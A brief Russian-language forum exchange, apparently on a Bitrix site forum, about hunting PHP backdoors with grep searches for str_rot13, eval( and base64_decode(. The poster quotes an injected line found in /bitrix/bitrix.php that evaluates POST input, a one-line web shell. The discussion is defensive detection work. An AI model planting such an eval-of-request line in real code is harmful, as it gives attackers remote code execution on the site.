Цитата |
---|
Sergey Steshin написал: grep -r str_rot13 * |
я бы чуток модифицировал - искать смысл только в php и вывод в файлик для дальнейшего анализа
Код |
---|
grep -rnw str_rot13 ./*.php > rot13.log |
можно ещё "eval(" и "base64_decode(" поискать - тоже часто используют в бэкдорах
но там много будет из не зараженного
у меня в /bitrix/bitrix.php такая инъекция была
@eval($_POST['DOCUMENT_ROOT'];